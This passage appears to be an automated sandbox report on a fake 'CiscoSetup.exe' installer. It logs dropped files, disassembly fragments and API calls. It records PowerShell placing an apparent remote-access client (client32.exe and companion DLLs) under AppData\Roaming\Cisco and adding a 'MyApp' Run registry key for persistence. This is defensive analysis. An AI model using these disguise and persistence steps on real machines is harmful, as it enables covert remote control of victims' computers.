                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_076892D9 push FFFFFFE8h; iretd 4_2_076892DD
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_088268EE push FFFFFFE9h; ret 4_2_088268F0
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08820F82 push esp; ret 4_2_08820F83
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1116B825 push ecx; ret 6_2_1116B838
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11166719 push ecx; ret 6_2_1116672C
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_68926BBF push ecx; ret 6_2_68926BD2
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_68924DF5 push 689243F9h; retf 6_2_68924E1F
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_689194C5 push ecx; ret 6_2_689194D8
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1116B825 push ecx; ret 9_2_1116B838
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1104E56B push ecx; retf 0007h9_2_1104E56C
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_11166719 push ecx; ret 9_2_1116672C
                                  Source: is-53P9C.tmp.2.drStatic PE information: section name: .text entropy: 6.8383653762559575
                                  Source: msvcr100.dll.4.drStatic PE information: section name: .text entropy: 6.909044922675825
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\ProxyCon.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\csc_ui_toast.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-0CFDM.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\Plugins\is-96AL6.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\pcicapi.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-I704D.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\Plugins\acdownloader.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnipsec.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\msvcp140_2.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\csc_ui_setup.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\acwebhelper.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-N98KR.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-KHO2L.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-91CSN.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-98QQL.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-EUMLH.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-8761D.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\csc_ui_toast.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnapishim.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-7ITNQ.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\acsock64.sys (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-O18K3.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-970AL.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_system.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\is-RN0PK.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-3JN2R.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnmgmttun.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\msvcp140.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\is-T4BIJ.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\is-Q7F68.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpncli.exe (copy)Jump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\PCICHEK.DLLJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-KLEUG.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\cfom.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\unins000.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\zlib1.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-P9NEN.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\InstallHelper.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-URJD8.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\is-VTFF8.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\InstallHelper64.exe (copy)Jump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\AudioCapture.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-Q7D23.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-D0HIO.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\_isetup\_setup64.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\msvcp140_1.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\ac_sock_fltr_api.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_thread.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-SINFC.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\is-1KC0P.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-5J2U6.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-OJMRD.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\acciscocrypto.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-1N4FB.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-2J155.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\acextwebhelper.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnagentutilities.dll (copy)Jump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\msvcr100.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\VACon64.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\Uninstall.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\acfeedback.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-VTDA9.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpncommoncrypt.dll (copy)Jump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\PCICL32.DLLJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnapi.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-3NCDE.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\is-8OL4N.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\concrt140.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnagent.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-MMI8M.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\remcmdstub.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\is-T9GPQ.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_filesystem.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-RDO3H.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-50H6H.tmpJump to dropped file
                                  Source: C:\Users\user\Desktop\CiscoSetup.exeFile created: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-H5812.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-2TJID.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\acwebhelper.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\acruntime.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-OTMTE.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\accurl.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-Q2D0Q.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnva64-6.sys (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-UM1NO.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\csc_ui.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-3VFI6.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-V8S0O.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_chrono.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-MGVA1.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-53P9C.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-S9VDU.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\acciscossl.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vccorlib140.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\WebView2Loader.dll (copy)Jump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\TCCTL32.DLLJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\HTCTL32.DLLJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-MKOUV.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_date_time.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\csc_ui.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpndownloader.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vcruntime140.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpncommon.dll (copy)Jump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\client32.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-S996S.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-D2T5K.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_68907030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod,6_2_68907030
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_688F50E0 CreateFileA,wsprintfA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA,6_2_688F50E0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_688F5117 GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA,6_2_688F5117
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_688F5490 GetPrivateProfileIntA,6_2_688F5490
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CiscoJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cisco\Cisco Secure Client for Windows.lnkJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MyAppJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MyAppJump to behavior

                                  Hooking and other Techniques for Hiding and Protection

                                  barindex
                                  Loading BitLocker PowerShell Module
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_110251B0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,6_2_110251B0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_111575D0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,6_2_111575D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_111575D0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,6_2_111575D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11025600 IsIconic,BringWindowToTop,GetCurrentThreadId,6_2_11025600
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1110F600 IsIconic,GetTickCount,6_2_1110F600
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_111579D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,6_2_111579D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1111F870 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,6_2_1111F870
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1111F870 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,6_2_1111F870
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_110238D0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,6_2_110238D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_110BFDD0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,6_2_110BFDD0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11023FB0 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,6_2_11023FB0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_110CA3C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,6_2_110CA3C0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_110CA3C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,6_2_110CA3C0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11110220 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,6_2_11110220
